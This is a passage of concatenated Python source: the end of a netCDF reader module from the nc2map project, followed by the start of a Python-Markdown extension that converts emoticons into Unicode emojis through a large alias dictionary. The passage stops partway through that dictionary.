return dir(super(NCReader, self)) + dir(self.nco)
def __getattr__(self, attr):
"""Tries to get attribute defined by this class and if not available,
return attribute from nco attribute"""
if attr in self.__dict__.keys():
return getattr(self, attr)
elif hasattr(self.nco, attr):
return getattr(self.nco, attr)
else:
raise AttributeError(
"'%s' object has no attribute '%s'" % (
self.__class__.__name__, attr))
class XrayReader(NCReader):
@staticmethod
def nco_base(filename_or_obj, *args, **kwargs):
kwargs.setdefault('decode_times', False)
if isinstance(filename_or_obj, xrayDataset):
return filename_or_obj
return open_dataset(filename_or_obj, *args, **kwargs)
def set_meta(self, var=None, **meta):
"""Set meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information
Keyword arguments (meta) describe the key, value pairs for the
meta informations"""
if var is not None and var not in self.variables.keys():
raise KeyError('Unknown variable %s' % var)
if var is None:
self.nco.attrs.update(meta)
else:
self.nco.variables[var].update(meta)
def _set_grid_file(self, filename_or_obj, *args, **kwargs):
if isinstance(filename_or_obj, xrayDataset):
self._grid_file = None
return
else:
return super(XrayReader, self)._set_grid_file(
filename_or_obj=filename_or_obj, *args, **kwargs)
def get_meta(self, var=None):
"""Get meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information"""
possible_keys = self.variables.keys() + list(self._timenames) + list(
self._levelnames) + list(self._lonnames) + list(self._latnames)
if var is not None and var not in possible_keys:
raise KeyError('Unknown variable %s' % var)
if var is None:
obj = self
elif var in self._lonnames:
obj = self.lon
elif var in self._latnames:
obj = self.lat
elif var in self._timenames:
obj = self.time
elif var in self._levelnames:
obj = self.level
else:
obj = self.variables[var]
return OrderedDict(obj.attrs)
class MFXrayReader(XrayReader):
@staticmethod
def nco_base(*args, **kwargs):
kwargs.setdefault('decode_times', False)
return open_mfdataset(*args, **kwargs)
class MFNCReader(NCReader):
"""nc2map compatible netCDF4.MFDataset class
Designed to manage a multifile dataset"""
nco_base = nc.MFDataset
def __init__(self, *args, **kwargs):
"""Initialization method of MFNCReader instance
Keyword arguments (kwargs) may be
- levelnames: set of strings: Gives the name of the level dimension
for which will be searched in the netCDF file
- timenames: set of strings: Gives the name of the time dimension
for which will be searched in the netCDF file
- lonnames: set of strings: Gives the name of the longitude dimension
for which will be searched in the netCDF file
- latnames: set of strings: Gives the name of the latitude dimension
for which will be searched in the netCDF file
Further args and kwargs are determined by the netCDF4.MFDataset
instance:
"""
super(MFNCReader, self).__init__(*args, **kwargs)
def set_meta(self, var=None, **meta):
"""Set meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information
Keyword arguments (meta) describe the key, value pairs for the
meta informations"""
raise ValueError(
"nc.MFDataset does not support setting of meta data information!")
class FlexibleReader(MFNCReader):
"""Class to handle unstructered grids that vary with time
This class is intended to manage 2D flexible mesh topologies, see
:ref:`https://github.com/ugrid-conventions/ugrid-conventions/blob/v0.9.0/ugrid-conventions.md#2d-flexible-mesh-mixed-triangles-quadrilaterals-etc-topology`
It is assumed that each file contains exactly one time step on a flexible
mesh. The get_data method does not accept '3d' and '4d' data shapes
``*args`` and ``**kwargs`` are the same as for :class:`MFNCReader`
Attributes
----------
unlimited: string, name of the unlimited dimension
"""
@property
def unlimited(self):
"""Name of the unlimited dimension in the files"""
return next(dim for dim, obj in self.nco.dimensions.items()
if obj.isunlimited())
@property
def unlimiteddim(self):
"""Variable corresponding to the unlimited dimension"""
return self.__nco.variables[self.unlimited]
@property
def unlimitedlist(self):
"""Alternative list of names for the unlimited dimension in the
files"""
unlimited = self.unlimited
for l in (self._levelnames, self._timenames, self._lonnames,
self._latnames):
if unlimited in l:
return l
return {unlimited}
def __init__(self, *args, **kwargs):
# same docstring as for MFNCReader.__init__
super(FlexibleReader, self).__init__(*args, **kwargs)
# the nco attribute will be overwritten when get_data is called
self.__nco = self.nco
def get_data(self, *args, **kwargs):
# same docstring as for MFNCReader.get_data
unlimited = set(kwargs) & self.unlimitedlist
if unlimited:
unlimited = list(unlimited)[0]
if unlimited in self._timenames:
dim_slice = self.get_time_slice(kwargs[unlimited])
else:
dim_slice = kwargs[unlimited]
else:
unlimited = self.unlimited
dim_slice = 0
if isinstance(dim_slice, slice):
dim_slice = range(*dim_slice.indices(len(self.unlimiteddim)))
try:
if len(dim_slice) > 1:
raise ValueError(
"It is impossible to return more than one step of the "
"unlimited variable %s. Use the gen_data method "
"instead." % unlimited)
self.nco = self.__nco._cdf[dim_slice[0]]
kwargs[unlimited] = [0]
except TypeError:
self.nco = self.__nco._cdf[dim_slice]
kwargs[unlimited] = 0
try:
return super(FlexibleReader, self).get_data(*args, **kwargs)
except:
raise
finally:
self.nco = self.__nco
__init__.__doc__ = MFNCReader.__init__.__doc__
get_data.__doc__ = MFNCReader.get_data.__doc__
# ------------ modify docstrings here ------------------
auto_set_reader.__doc__ += ', '.join(readers)
|
Chilipp/nc2map
|
readers.py
|
Python
|
gpl-2.0
| 129,034
|
[
"NetCDF"
] |
9f005a857e866b94a6a15a58fdd5ba0f92d555db673851a7937547bb5547552f
|
# coding: utf-8
"""
Unicode Emojis for Python-Markdown
==================================
Converts defined emoticon symbols to Unicode emojis, supported on a
variety of devices [1].
[1]: http://apps.timwhitlock.info/emoji/tables/unicode#block-1-emoticons
Usage:
>>> from __future__ import print_function
>>> from markdown import markdown
>>> text = 'I <3 you! Just kidding. :P'
>>> print(markdown(text, ['unimoji'])) # doctest: +NORMALIZE_WHITESPACE
<p>I <span class="emoji" style="color:red">❤</span> you! \
Just kidding. <span class="emoji">😛</span></p>
**NOTE**: The emojis are only replaced when whitespace-delimited on both sides!
The following options are accepted:
- `emoji`, the emoticon-to-list-of-aliases mapping,
- `span_class`, the class name of the encompassing `<span>` element
(default: 'emoji'). No element is created if `None`.
An example with these custom settings:
>>> from mdx_unimoji import UnimojiExtension
>>> img_heart = '<img alt="love" src="heart.png"/>'
>>> img_tongue = '<img alt=":P" src="tongue.png"/>'
>>> overrides = UnimojiExtension.EMOJI
>>> overrides.update({img_heart: ['<3'],
... img_tongue: ':p :P :-p :-P'.split()})
>>> print(markdown(text,
... extensions=[UnimojiExtension(span_class='other',
... emoji=overrides)]))
... # doctest: +NORMALIZE_WHITESPACE
<p>I <img alt="love" class="other" src="heart.png" /> you! \
Just kidding. <img alt=":P" class="other" src="tongue.png" /></p>
You can use the `span_class` value in your CSS, e.g.:
.emoji {
font-family: "Apple Color Emoji", "Segoe UI Emoji",
"Noto Color Emoji", EmojiSymbols, "DejaVu Sans", Symbola;
}
HF!
"""
from __future__ import unicode_literals
from markdown import Extension
from markdown.util import etree
from markdown.inlinepatterns import Pattern
class UnimojiExtension(Extension):
EMOJI = { '😆': ":lol: :funny: :happy: :glad: :laughing:".split(),
'😊': ":) :-) :] :-] =) =] ^^ ^_^ :smile: :crush: :embarrassed: :shy: :blush:".split(),
'😃': ":smiley:".split(),
'😏': ":> :-> :mean: :smug: :smirk:".split(),
'😍': ":crush: :heart_eyes:".split(),
'😘': "';* ;-* :kiss: :kissing_heart:".split(),
'😚': ":* :-* :kissing_closed_eyes:".split(),
'😳': ":$ :-$ :flustered: :embarassed: :flattered: :flushed:".split(),
'😌': ":relaxed: :phew: :massage: :happiness: :relieved:".split(),
'😆': "xD XD :contented: :satisfied:".split(),
'😁': ":grin:".split(),
'😉': ";) ;-) ;] ;-] :flirt: :mischievous: :secret: :wink:".split(),
'😜': ";p ;-p ;P ;-P :childish: :mischievous: :stuck_out_tongue_winking_eye:".split(),
'😝': ":mischievous: :stuck_out_tongue_closed_eyes:".split(),
'😀': ":smiling: :grinning:".split(),
'😗': ":3: :kissing:".split(),
'😙': ":smooch: :kissing_smiling_eyes:".split(),
'😛': ":p :-p :P :-P =p =P :childish: :playful: :mischievous: :stuck_out_tongue:".split(),
'😴': ":asleep: :tired: :sleepy: :night: :zzz: :sleeping:".split(),
'😟': ":frustrated: :scared: :concern: :nervous: :worried:".split(),
'😦': ":aw: :what: :frowning:".split(),
'😧': ":stunned: :nervous: :anguished:".split(),
'😮': ":surprise: :impressed: :wow: :open_mouth:".split(),
'😬': ":grimace: :teeth: :grimacing:".split(),
'😕': ":baffled: :puzzled: :indifference: :huh: :weird: :hmmm: :confused:".split(),
'😯': ":woo: :shh: :conceal: :hide:".split(),
'😑': "-_- :deadpan: :indifferent: :meh: :expressionless:".split(),
'😒': ":/ :-/ :\\ :-\\ =/ =\\ :L :sarcasm: :indifference: :bored: :straight: :serious: :unamused:".split(),
'😅': ":relief: :laugh: :sweat_smile:".split(),
'😓': ":-X :X :-# :# :-& :& :stressed: :tired: :exercise: :sweat:".split(),
'😥': ":phew: :sweat: :nervous: :disappointed_relieved:".split(),
'😩': ":tired: :sleepy: :frustrated: :upset: :weary:".split(),
'😔': ":depressed: :okay: :upset: :pensive:".split(),
'😞': ":( :-( ;( ;-( =( =[ :lonely: :upset: :depressed: :disappointed:".split(),
'😖': ":s :-s :S :-S :confused: :sick: :unwell: :oops: :confounded:".split(),
'😨': ":scared: :afraid: :nervous: :scared: :terrified: :oops: :huh: :fearful:".split(),
'😰': ":scared: :frightened: :nervous: :scared: :cold_sweat:".split(),
'😣': "x( X( :sick: :no: :upset: :oops: :persevere:".split(),
'😢': ":,( :'( =,( ='( :tear: :tears: :depressed: :upset: :cry:".split(),
'😭': ":sad: :cry: :tears: :upset: :depressed: :sob:".split(),
'😂': ":,D :'D =,D ='D :happytears: :cry: :tears: :weep: :haha: :joy:".split(),
'😲': ":O :-O 8-O =O :xox: :surprised: :poisoned: :astonished:".split(),
'😱': ":halloween: :scary: :scared: :terrified: :munch: :omg: :scream:".split(),
'😫': ":sick: :whine: :upset: :frustrated: :tired_face:".split(),
'😠': ">:( >=( :mad: :annoyed: :frustrated: :angry:".split(),
'😡': ":furious: :mad: :hate: :despise: :rage:".split(),
'😤': ":gas: :phew: :proud: :pride: :triumph:".split(),
'😪': ":tired: :zzz: :rest: :nap: :sleepy:".split(),
'😋': ":delicious: :tongue: :silly: :yummy: :yum:".split(),
'😷': ":sick: :ill: :disease: :mask:".split(),
'😎': "8) 8-) :shades: :sunglasses:".split(),
'😵': "x-O X-O :ko: :spent: :unconscious: :xox: :dizzy_face:".split(),
'👿': ":devil: :horns: :imp:".split(),
'😈': "3:) 3:-) >:) >:-) >;) >;-) :devil: :horns: :smiling_imp:".split(),
'😐': ":indifference: :meh: :neutral_face:".split(),
'😶': ":hellokitty: :silent:".split(),
'😇': "O:) O:-) :angel: :heaven: :halo: :innocent:".split(),
'👽': ":extraterrestrial: :UF:O :paul: :weird: :outer_space: :alien:".split(),
'💛': ":yellow_heart:".split(),
'💙': ":blue_heart:".split(),
'💜': ":purple_heart:".split(),
'❤': "<3 :heart:".split(),
'💚': ":green_heart:".split(),
'💔': "</3 :sorry: :break: :broken_heart:".split(),
'💓': ":heartbeat:".split(),
'💗': ":heartpulse:".split(),
'💕': ":two_hearts:".split(),
'💞': ":revolving_hearts:".split(),
'💘': ":cupid:".split(),
'💖': ":sparkling_heart:".split(),
'✨': ":stars: :shine: :shiny: :awesome: :good: :magic: :sparkles:".split(),
'⭐': ":night: :star:".split(),
'💫': ":sparkle: :shoot: :dizzy:".split(),
'💥': ":explosion: :bomb: :explode: :collision: :blown: :boom: :accident: :fight: :boom:".split(),
'💢': ":mad: :anger:".split(),
'❗': ":heavy_exclamation_mark: :danger: :surprise: :punctuation: :wow: :warning: :exclamation:".split(),
'❓': ":doubt: :confused: :question:".split(),
'❕': ":surprise: :punctuation: :gray: :wow: :warning: :grey_exclamation:".split(),
'❔': ":doubts: :gray: :huh: :grey_question:".split(),
'💤': ":sleep: :bored: :sleepy: :tired: :zzz:".split(),
'💨': ":wind: :air: :fast: :shoo: :fart: :smoke: :puff: :dash:".split(),
'💦': ":drip: :oops: :sweat_drops:".split(),
'🎶': ":notes:".split(),
'🎵': ":tone: :musical_note:".split(),
'🔥': ":cook: :flame: :fire:".split(),
'💩': ":poop: :shitface: :fail: :turd: :hankey:".split(),
'💩': ":shit: :turd: :poop:".split(),
'💩': ":poop: :shit:".split(),
'👍': ":thumbsup: :yes: :agree: :accept: :cool: :+1:".split(),
'👎': ":dislike: :no: :thumbsdown: :-1:".split(),
'👌': ":limbs: :perfect: :ok_hand:".split(),
'👊': ":pound: :punch:".split(),
'👊': ":violence: :fist: :hit: :attack: :facepunch:".split(),
'✊': ":grasp: :fist:".split(),
'✌': ":peace: :deuces: :ohyeah: :victory: :two: :v:".split(),
'👋': ":hi: :hello: :bye: :hands: :gesture: :goodbye: :solong: :farewell: :palm: :wave:".split(),
'✋': ":stop: :highfive: :palm: :ban: :raised_hand: :hand:".split(),
'✋': ":raised_hand:".split(),
'👐': ":butterfly: :open_hands:".split(),
'☝': ":point_up:".split(),
'👇': ":point_down:".split(),
'👈': ":point_left:".split(),
'👉': ":point_right:".split(),
'🙌': "\\o/ :gesture: :hooray: :yea: :celebration: :raised_hands:".split(),
'🙏': ":please: :hope: :wish: :namaste: :pray:".split(),
'👏': ":hands: :praise: :applause: :congrats: :yay: :clap:".split(),
'💪': ":arm: :flex: :strong: :muscle:".split(),
'🏃': ":walking: :exercise: :race: :running: :runner:".split(),
'🏃': ":running:".split(),
'👫': ":date: :dating: :marriage: :couple:".split(),
'👪': ":parents: :family:".split(),
'👬': ":gay: :couple: :bromance: :friendship: :two_men_holding_hands:".split(),
'👭': ":gay: :friendship: :couple: :lesbian: :two_women_holding_hands:".split(),
'💃': ":dancer:".split(),
'👯': ":bunny: :girls: :dancers:".split(),
'🙆': ":ok_woman:".split(),
'🙅': ":nope: :no_good:".split(),
'💁': ":information_desk_person:".split(),
'🙋': ":raising_hand:".split(),
'👰': ":couple: :marriage: :wedding: :bride_with_veil:".split(),
'🙎': ":person_with_pouting_face:".split(),
'🙍': ":depressed: :discouraged: :person_frowning:".split(),
'🙇': ":bow:".split(),
'💏': ":dating: :marriage: :couplekiss:".split(),
'💑': ":dating: :marriage: :couple_with_heart:".split(),
'💆': ":head: :massage:".split(),
'💇': ":haircut:".split(),
'💅': ":manicure: :beauty: :finger: :nail_care:".split(),
'👦': ":boy:".split(),
'👧': ":girl:".split(),
'👩': ":girls: :lady: :woman:".split(),
'👨': ":mustache: :dad: :classy: :sir: :moustache: :man:".split(),
'👶': ":infant: :child: :toddler: :baby:".split(),
'👵': ":grandma: :granny: :lady: :older_woman:".split(),
'👴': ":grandpa: :grandad: :men: :older_man:".split(),
'👱': ":blonde: :person_with_blond_hair:".split(),
'👲': ":man_with_gua_pi_mao:".split(),
'👳': ":indian: :hinduism: :arabs: :man_with_turban:".split(),
'👷': ":wip: :build: :construction_worker:".split(),
'👮': ":police: :policeman: :arrest: :911: :cop:".split(),
'👼': ":heaven: :wings: :halo: :angel:".split(),
'👸': ":blond: :crown: :royal: :queen: :princess:".split(),
'😺': ":^D =^D :smiley_cat:".split(),
'😸': ":^) :} :-} :3 :-3 :smile_cat:".split(),
'😻': ":heart_eyes_cat:".split(),
'😽': ":kissing_cat:".split(),
'😼': ":smirk_cat:".split(),
'🙀': ":munch: :scared: :scream_cat:".split(),
'😿': ":^( :{ :tears: :weep: :upset: :crying_cat_face:".split(),
'😹': ":haha: :tears: :joy_cat:".split(),
'😾': ":pouting_cat:".split(),
'👹': ":namahage: :monster: :mask: :halloween: :scary: :creepy: :devil: :demon: :japanese_ogre:".split(),
'👺': ":tengu: :evil: :mask: :monster: :scary: :creepy: :japanese_goblin:".split(),
'🙈': ":haha: :see_no_evil:".split(),
'🙉': ":hear_no_evil:".split(),
'🙊': ":omg: :speak_no_evil:".split(),
'💂': ":royal: :guardsman:".split(),
'💀': ":scary: :halloween: :dead: :skeleton: :creepy: :skull:".split(),
'🐾': ":tracking: :footprints: :dog: :cat: :paw_prints: :feet:".split(),
'👄': ":mouth: :kiss: :lips:".split(),
'💋': ":lips: :kiss:".split(),
'💧': ":drip: :faucet: :droplet:".split(),
'👂': ":hear: :listen: :ear:".split(),
'👀': ":eye-rolling: :look: :watch: :stalk: :peek: :see: :eyes:".split(),
'👃': ":smell: :sniff: :nose:".split(),
'👅': ":mouth: :playful: :tongue:".split(),
'💌': ":envelope: :love_letter:".split(),
'👤': ":user: :person: :bust_in_silhouette:".split(),
'👥': ":group: :team: :busts_in_silhouette:".split(),
'💬': ":bubble: :message: :talk: :chatting: :speech_balloon:".split(),
'💭': ":cloud: :speech: :thinking: :thought_balloon:".split(),
'☀': ":brightness: :sunny:".split(),
'☂': ":rain: :rainy: :umbrella:".split(),
'☁': ":sky: :cloud:".split(),
'❄': ":snowflake:".split(),
'☃': ":frozen: :snowman: :snowmen:".split(),
'⚡': ":lightning: :thunder: :lightning: :bolt: :fast: :zap:".split(),
'🌀': ":swirl: :cloud: :cyclone:".split(),
'🌁': ":fog: :mountain: :foggy:".split(),
'🌊': ":waves: :wave: :tsunami: :disaster: :ocean:".split(),
'🐱': ":meow: :cat:".split(),
'🐶': ":friend: :woof: :puppy: :faithful: :dog:".split(),
'🐭': ":cheese: :mouse:".split(),
'🐹': ":hamster:".split(),
'🐰': ":rabbit:".split(),
'🐺': ":wild: :audrey: :lulu:".split(),
'🐸': ":croak: :frog:".split(),
'🐯': ":cat: :danger: :wild: :roar: :tiger:".split(),
'🐨': ":koala:".split(),
'🐻': ":wild: :bear:".split(),
'🐷': ":oink: :pig:".split(),
'🐽': ":oink: :pig_nose:".split(),
'🐮': ":beef: :ox: :moo: :milk: :cow:".split(),
'🐗': ":boar:".split(),
'🐵': ":ape: :monkey_face:".split(),
'🐒': ":ape: :monkey:".split(),
'🐴': ":brown: :unicorn: :horse:".split(),
'🐎': ":gamble: :luck: :racehorse:".split(),
'🐫': ":desert: :hump: :camel:".split(),
'🐑': ":wool: :shipit: :sheep:".split(),
'🐘': ":nose: :thailand: :elephant:".split(),
'🐼': ":panda_face:".split(),
'🐍': ":serpent: :evil: :hiss: :snake:".split(),
'🐦': ":fly: :tweet: :bird:".split(),
'🐤': ":baby_chick:".split(),
'🐥': ":baby: :hatched_chick:".split(),
'🐣': ":bird-egg: :egg: :born: :baby: :hatching_chick:".split(),
'🐔': ":cluck: :chicken:".split(),
'🐧': ":penguin:".split(),
'🐢': ":tortoise: :turtle:".split(),
'🐛': ":worm: :bug:".split(),
'🐝': ":honeybee:".split(),
'🐜': ":insect: :ant:".split(),
'🐞': ":beetle:".split(),
'🐌': ":slow: :shell: :snail:".split(),
'🐙': ":creature: :octopus:".split(),
'🐠': ":swim: :nemo: :tropical_fish:".split(),
'🐟': ":fish:".split(),
'🐳': ":whale:".split(),
'🐬': ":fish: :flipper: :fins: :dolphin:".split(),
'🐏': ":sheep: :ram:".split(),
'🐀': ":mouse: :rodent: :rat:".split(),
'🐃': ":ox: :cow: :water_buffalo:".split(),
'🐉': ":dragon:".split(),
'🐐': ":goat:".split(),
'🐓': ":rooster:".split(),
'🐂': ":cow: :beef: :ox:".split(),
'🐲': ":dragon_face:".split(),
'🐡': ":blowfish:".split(),
'🐊': ":alligator: :reptile: :crocodile:".split(),
'🐪': ":desert: :hump: :dromedary_camel:".split(),
'🐆': ":leopard:".split(),
'🐩': ":dog: :101: :poodle:".split(),
'🐾': ":paw_prints:".split(),
'💐': ":bouquet:".split(),
'🌸': ":flower: :cherry_blossom:".split(),
'🌷': ":tulip:".split(),
'🍀': ":lucky: :four_leaf_clover:".split(),
'🌹': ":rose:".split(),
'🌻': ":fall: :sunflower:".split(),
'🌺': ":beach: :hibiscus:".split(),
'🍁': ":canada: :fall: :maple_leaf:".split(),
'🍃': ":tree: :grass: :lawn: :leaves:".split(),
'🍂': ":leaves: :fallen_leaf:".split(),
'🌿': ":medicine: :weed: :grass: :lawn: :herb:".split(),
'🍄': ":mushroom:".split(),
'🌵': ":cactus:".split(),
'🌴': ":beach: :palm_tree:".split(),
'🌲': ":evergreen_tree:".split(),
'🌳': ":deciduous_tree:".split(),
'🌰': ":squirrel: :chestnut:".split(),
'🌱': ":grass: :lawn: :seedling:".split(),
'🌼': ":blossom:".split(),
'🌾': ":ear_of_rice:".split(),
'🐚': ":beach: :shell:".split(),
'🌐': ":earth: :international: :world: :internet: :interweb: :i18n: :globe_with_meridians:".split(),
'🌞': ":sky: :sun_with_face:".split(),
'🌝': ":full_moon_with_face:".split(),
'🌚': ":new_moon_with_face:".split(),
'🌑': ":new_moon:".split(),
'🌒': ":waxing_crescent_moon:".split(),
'🌓': ":first_quarter_moon:".split(),
'🌔': ":waxing_gibbous_moon:".split(),
'🌕': ":full_moon:".split(),
'🌖': ":waxing_gibbous_moon: :waning_gibbous_moon:".split(),
'🌗': ":last_quarter_moon:".split(),
'🌘': ":waning_crescent_moon:".split(),
'🌜': ":last_quarter_moon_with_face:".split(),
'🌛': ":first_quarter_moon_with_face:".split(),
'🌙': ":night: :sleep: :sky: :evening: :crescent_moon:".split(),
'🌍': ":europe: :emea: :globe: :world: :international: :earth_africa:".split(),
'🌎': ":globe: :world: :USA: :international: :earth_americas:".split(),
'🌏': ":globe: :world: :east: :international: :earth_asia:".split(),
'🌋': ":disaster: :volcano:".split(),
'🌌': ":space: :stars: :milky_way:".split(),
'⛅': ":cloudy: :fall: :partly_sunny:".split(),
'🎍': ":panda: :bamboo:".split(),
'💝': ":gift_heart:".split(),
'🎎': ":toy: :kimono: :dolls:".split(),
'🎒': ":student: :education: :bag: :school_satchel:".split(),
'🎓': ":edu: :university: :college: :degree: :graduation: :cap: :hat: :learn: :education: :mortar_board:".split(),
'🎏': ":fish: :koinobori: :carp: :banner: :flags:".split(),
'🎆': ":carnival: :congratulations: :fireworks:".split(),
'🎇': ":stars: :night: :sparkler:".split(),
'🎐': ":ding: :bell: :wind_chime:".split(),
'🎑': ":japan: :asia: :tsukimi: :rice_scene:".split(),
'🎃': ":halloween: :light: :pumpkin: :creepy: :fall: :jack_o_lantern:".split(),
'👻': ":boom: :halloween: :spooky: :scary: :ghost:".split(),
'🎅': ":xmas: :christmas: :santa:".split(),
'🎄': ":december: :celebration: :christmas_tree:".split(),
'🎁': ":present: :gift:".split(),
'🔔': ":notification: :chime: :bell:".split(),
'🔕': ":mute: :quiet: :silent: :no_bell:".split(),
'🎋': ":branch: :tanabata_tree:".split(),
'🎉': ":contulations: :tada:".split(),
'🎊': ":celebration: :confetti_ball:".split(),
'🎈': ":celebration: :balloon:".split(),
'🔮': ":disco: :fortune_teller: :crystal_ball:".split(),
'💿': ":dvd: :disk: :disc: :cd:".split(),
'📀': ":cd: :disk: :disc: :dvd:".split(),
'💾': ":floppy_disk:".split(),
'📷': ":gadgets: :camera:".split(),
'📹': ":film: :record: :video_camera:".split(),
'🎥': ":film: :record: :movie_camera:".split(),
'💻': ":tech: :laptop: :screen: :display: :monitor: :computer:".split(),
'📺': ":television: :program: :show: :tv:".split(),
'📱': ":apple: :gadgets: :dial: :iphone:".split(),
'☎': ":dial: :telephone: :phone:".split(),
'☎': ":calling: :telephone:".split(),
'📞': ":dial: :telephone_receiver:".split(),
'📟': ":bbcall: :pager:".split(),
'📠': ":fax:".split(),
'💽': ":data: :disk: :minidisc:".split(),
'📼': ":record: :video: :vhs:".split(),
'🔉': ":loud: :noise: :speaker: :broadcast: :sound:".split(),
'🔈': ":silence: :broadcast: :speaker:".split(),
'🔇': ":silence: :quiet: :mute:".split(),
'📢': ":loudspeaker:".split(),
'📣': ":speaker: :mega:".split(),
'⌛': ":time: :clock: :limit: :exam: :quiz: :test: :hourglass:".split(),
'⏳': ":time: :countdown: :hourglass_flowing_sand:".split(),
'⏰': ":time: :wake: :alarm_clock:".split(),
'⌚': ":clock: :time: :watch:".split(),
'📻': ":podcast: :program: :radio:".split(),
'📡': ":future: :radio: :space: :satellite:".split(),
'➿': ":tape: :cassette: :loop:".split(),
'🔍': ":magnifying: :glass: :search: :zoom: :find: :detective: :mag:".split(),
'🔎': ":mag_right:".split(),
'🔓': ":privacy: :unlock:".split(),
'🔒': ":password: :padlock: :lock:".split(),
'🔏': ":secret: :lock_with_ink_pen:".split(),
'🔐': ":closed_lock_with_key:".split(),
'🔑': ":lock: :door: :password: :key:".split(),
'💡': ":light: :electricity: :idea: :bulb:".split(),
'🔦': ":dark: :camping: :sight: :night: :flashlight:".split(),
'🔆': ":light: :high_brightness:".split(),
'🔅': ":afternoon: :warm: :low_brightness:".split(),
'🔌': ":charger: :power: :electric_plug:".split(),
'🔋': ":power: :energy: :sustain: :battery:".split(),
'📲': ":iphone: :incoming: :calling:".split(),
'✉': ":envelope: :postal: :letter:".split(),
'📫': ":inbox: :mailbox:".split(),
'📮': ":envelope: :postbox:".split(),
'🛀': ":clean: :shower: :bathroom: :bath:".split(),
'🛁': ":clean: :shower: :bathroom: :bathtub:".split(),
'🚿': ":clean: :bathroom: :shower:".split(),
'🚽': ":restroom: :wc: :washroom: :bathroom: :potty: :toilet:".split(),
'🔧': ":diy: :ikea: :fix: :maintainer: :wrench:".split(),
'🔩': ":handy: :fix: :nut_and_bolt:".split(),
'🔨': ":verdict: :judge: :done: :ruling: :gavel: :hammer:".split(),
'💺': ":sit: :airplane: :transport: :bus: :flight: :fly: :seat:".split(),
'💰': ":payment: :coins: :sale: :moneybag:".split(),
'💴': ":currency: :yen:".split(),
'💵': ":bill: :currency: :dollar:".split(),
'💷': ":sterling: :bills: :england: :currency: :pound:".split(),
'💶': ":currency: :euro:".split(),
'💳': ":payment: :credit_card:".split(),
'💸': ":bills: :payment: :sale: :money_with_wings:".split(),
'📧': ":send: :e:".split(),
'📥': ":inbox_tray:".split(),
'📤': ":inbox: :outbox_tray:".split(),
'✉': ":message: :envelope:".split(),
'📨': ":inbox: :incoming_envelope:".split(),
'📯': ":postal_horn:".split(),
'📪': ":inbox: :mailbox_closed:".split(),
'📬': ":mailbox_with_mail:".split(),
'📭': ":mailbox_with_no_mail:".split(),
'📦': ":box: :gift: :cardboard: :moving: :package:".split(),
'🚪': ":house: :entry: :exit: :door:".split(),
'🚬': ":smoke: :kills: :tobacco: :cigarette: :joint: :smoking:".split(),
'💣': ":boom: :explode: :explosion: :terrorism: :bomb:".split(),
'🔫': ":violence: :pistol: :revolver: :gun:".split(),
'🔪': ":knife: :blade: :cutlery: :kitchen: :hocho:".split(),
'💊': ":medicine: :doctor: :pharmacy: :drug: :pill:".split(),
'💉': ":hospital: :drugs: :blood: :medicine: :needle: :doctor: :nurse: :syringe:".split(),
'📄': ":paper: :information: :page_facing_up: :documents:".split(),
'📃': ":page_with_curl:".split(),
'📑': ":favorite: :order: :tidy: :bookmark_tabs:".split(),
'📊': ":bar_chart:".split(),
'📈': ":recovery: :success: :chart_with_upwards_trend:".split(),
'📉': ":recession: :failure: :chart_with_downwards_trend:".split(),
'📜': ":ancient: :history: :scroll:".split(),
'📋': ":clipboard:".split(),
'📆': ":schedule: :date: :planning: :calendar:".split(),
'📅': ":calendar: :date:".split(),
'📇': ":card_index:".split(),
'📁': ":file_folder:".split(),
'📂': ":load: :open_file_folder:".split(),
'✂': ":cut: :scissors:".split(),
'📌': ":mark: :here: :pushpin:".split(),
'📎': ":paperclip:".split(),
'✒': ":pen: :writing: :write: :black_nib:".split(),
'📏': ":calculate: :length: :drawing: :architect: :sketch: :straight_ruler:".split(),
'📐': ":architect: :sketch: :triangular_ruler:".split(),
'📕': ":learn: :closed_book:".split(),
'📗': ":study: :green_book:".split(),
'📘': ":learn: :study: :blue_book:".split(),
'📙': ":study: :orange_book:".split(),
'📓': ":record: :notes: :study: :notebook:".split(),
'📔': ":classroom: :notes: :record: :study: :notebook_with_decorative_cover:".split(),
'📒': ":notes: :ledger:".split(),
'📚': ":literature: :study: :books:".split(),
'🔖': ":favorite: :label: :bookmark:".split(),
'📛': ":fire: :forbid: :name_badge:".split(),
'🔬': ":laboratory: :experiment: :zoomin: :science: :study: :microscope:".split(),
'🔭': ":stars: :space: :zoom: :telescope:".split(),
'📰': ":press: :headline: :newspaper:".split(),
'🏈': ":football:".split(),
'🏀': ":basketball:".split(),
'⚽': ":football: :fifa: :soccer:".split(),
'⚾': ":baseball:".split(),
'🎾': ":tennis:".split(),
'🏉': ":team: :rugby_football:".split(),
'🎳': ":bowling:".split(),
'⛳': ":flag: :hole: :golf:".split(),
'🚵': ":race: :bike: :mountain_bicyclist:".split(),
'🚴': ":bike: :exercise: :hipster: :bicyclist:".split(),
'🏇': ":betting: :competition: :gambling: :luck: :horse_racing:".split(),
'🏂': ":snowboarder:".split(),
'🏊': ":exercise: :athlete: :swimmer:".split(),
'🏄': ":beach: :surfer:".split(),
'🎿': ":snow: :ski:".split(),
'♠': ":spades:".split(),
'♥': ":hearts:".split(),
'♣': ":clubs:".split(),
'♦': ":diamonds:".split(),
'💎': ":ruby: :diamond: :jewelry: :gem:".split(),
'💍': ":wedding: :propose: :marriage: :diamond: :jewelry: :gem: :ring:".split(),
'🏆': ":win: :award: :contest: :place: :ftw: :ceremony: :trophy:".split(),
'🎼': ":treble: :clef: :musical_score:".split(),
'🎹': ":piano: :musical_keyboard:".split(),
'🎻': ":orchestra: :symphony: :violin:".split(),
'👾': ":arcade: :space_invader:".split(),
'🎮': ":controller: :console: :PS4: :video_game:".split(),
'🃏': ":poker: :cards: :black_joker:".split(),
'🎴': ":sunset: :flower_playing_cards:".split(),
'🎲': ":dice: :random: :tabbletop: :luck: :game_die:".split(),
'🎯': ":dart:".split(),
'🀄': ":kanji: :mahjong:".split(),
'🎬': ":movie: :film: :record: :clapper:".split(),
'📝': ":writing: :exam: :quiz: :test: :study: :memo:".split(),
'📝': ":write: :pencil:".split(),
'📖': ":open_book: :literature: :learn: :study: :book:".split(),
'🎨': ":design: :paint: :draw: :art:".split(),
'🎤': ":PA: :microphone:".split(),
'🎧': ":gadgets: :headphones:".split(),
'🎺': ":brass: :trumpet:".split(),
'🎷': ":jazz: :blues: :saxophone:".split(),
'🎸': ":guitar:".split(),
